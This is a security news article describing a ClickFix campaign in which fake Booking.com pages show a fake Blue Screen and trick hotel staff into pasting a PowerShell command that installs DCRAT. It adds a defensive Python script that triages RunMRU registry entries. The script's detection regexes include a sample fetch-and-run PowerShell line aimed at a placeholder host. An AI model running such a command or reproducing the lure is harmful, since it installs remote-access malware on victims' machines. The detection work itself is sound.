New ClickFix Attack Campaign Uses Fake Windows Blue Screen (BSOD) to Trick Victims Into Installing Malware


07/69 Wednesday, January 7, 2026

Security researchers from Securonix have identified a new cyberattack campaign dubbed PHALT#BLYX, targeting businesses in the travel and hospitality sector. Attackers send phishing emails impersonating customers from Booking[.]com, claiming to cancel hotel reservations and requesting unusually large refunds to create a sense of urgency. When employees click the link in the email, they are redirected to a convincing fake Booking[.]com website that is difficult to distinguish from the legitimate site at a glance.

What makes this campaign particularly notable is the use of the ClickFix social-engineering technique combined with a fake Blue Screen of Death (BSOD). The fraudulent website displays a message stating that the page is “taking too long to load.” When the victim refreshes the page, the browser shows a blue screen mimicking a system crash, along with deceptive instructions telling the user to press Windows + R, then Ctrl + V, and Enter to fix the issue. In reality, these steps trick the victim into pasting and executing a malicious PowerShell command that the attackers have preloaded into the clipboard.

If the victim follows these instructions, the command immediately downloads and installs a Remote Access Trojan (RAT) known as DCRAT. This malware enables attackers to remotely control the compromised system, log keystrokes, steal sensitive information, secretly install cryptocurrency miners, and use the infected machine as a foothold to attack the organization’s internal network. The entire infection chain is designed to evade detection by Windows Defender, making the attack particularly stealthy and dangerous.
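
For defenders, a command run through Windows + R leaves a trace: Windows records Run-dialog history per user in the RunMRU registry key. The following is an added example, not taken from the Securonix research or the source article, that triages RunMRU values collected from an endpoint; the indicator list, the threshold and the sample values are assumptions constructed for illustration.

```python
import re

# Commands entered in the Win+R dialog are stored per user under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# values a, b, c... each hold one command plus a trailing "\1",
# and MRUList gives their order, most recent first.
# Heuristic indicators (an assumption of this example, tune before use).
INDICATORS = [
    ("script-host", re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)\b", re.I)),
    ("hidden-window", re.compile(r"(?<!\w)-w\w*\s+h\w*", re.I)),
    ("encoded-command", re.compile(r"(?<!\w)-e\w*\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download-or-eval", re.compile(
        r"\b(iex|irm|iwr|invoke-\w+|downloadstring|curl|bitsadmin)\b", re.I)),
    ("remote-url", re.compile(r"https?://", re.I)),
]


def parse_runmru(values):
    """Return Run-dialog commands from a RunMRU value dict, most recent first."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            # Drop the trailing "\1" marker Explorer appends to each entry.
            commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands


def triage(values, threshold=2):
    """Flag entries that match at least `threshold` indicators.

    A single hit (a bare "cmd") is ordinary use; a pasted one-liner that
    downloads and runs a payload usually matches several at once.
    """
    findings = []
    for command in parse_runmru(values):
        hits = [label for label, rx in INDICATORS if rx.search(command)]
        if len(hits) >= threshold:
            findings.append((command, hits))
    return findings


# Constructed sample of one user's RunMRU values (not from the campaign).
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (irm https://example.invalid/fix)"\\1',
}

if __name__ == "__main__":
    for command, hits in triage(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS: {command}\n  indicators: {', '.join(hits)}")
```

RunMRU only shows that a command was entered in the Run dialog, so a flagged entry is a lead to correlate with process-creation and PowerShell logging, not proof of compromise.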

Source: https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-bsod-screens-to-push-malware/